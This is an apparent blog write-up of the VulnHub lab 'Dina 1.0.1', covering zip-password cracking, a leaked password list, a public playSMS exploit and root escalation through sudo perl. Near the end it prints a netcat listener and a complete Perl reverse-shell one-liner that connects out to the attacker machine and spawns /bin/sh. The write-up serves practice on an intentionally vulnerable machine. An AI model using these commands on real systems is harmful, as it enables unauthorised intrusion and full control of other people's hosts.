IT and security stuff

Dina 1.0.1 Writeup

In this Writeup, I will go through Dina 1.0 made by Touhid Shaikh available for free on VulnHub.

I start by finding the target’s IP address. netdiscover -r 10.0.3.0/24

Seems like there is only one port open. 80 is usually a website.
Source code reveals nothing of interest. Clicking “Sub Query” brings to an empty file folder and it’s pretty useless too.
Next i use dirbuster to list the website’s folders.

Found a couple folders. Let’s try them out!
/uploads same as /ange1.
/secure contains a file names “backup.zip”. I download it to see what it contains.
The zip has a mp3 file in it which i can’t access because it is password protected.

Let’s try cracking it! I use zip2john to convert the file into a hash. Then I use john to crack it.

The password is “freedom”.
This is interesting and funny. I extract it and try to read strings in it.
I totally agree with touhid :P. It also reveals another folder.
/tmp has nothing to offer
/nothing appears to be an improvised “not found” page. Let’s check source code.
<html>
<head><title>404 NOT FOUND</title></head>
<body>
<!--
#my secret pass
freedom
password
helloworld!
diana
iloveroot
-->
<h1>NOT FOUND</html>
<h3>go back</h3>
</body>
</html>

Looks like we found touhid’s password list!

Finally, going to /SecreTSMSgatwayLogin reveals “playSMS’ web application. Let’s try logging in.
Success! Using username touhid and a password found in the list earlier i logged in. Now let’s see if there are any known vulns.
https://github.com/jasperla/CVE-2017-9101 reveals a nice python script which should abuse an exploit and give us a reverse shell!
Download and run.
Success! got our first shell.

sudo -l reveals something we might use to escalate

We might be able to run perl a root. Let’s try!

First start a listener on our local machine.

nc -nlvp 4444

Now let’s try a nice perl reverse shell script.

perl -e 'use Socket;$i="10.0.3.4";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Boom! that was easy.
Bingo!

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.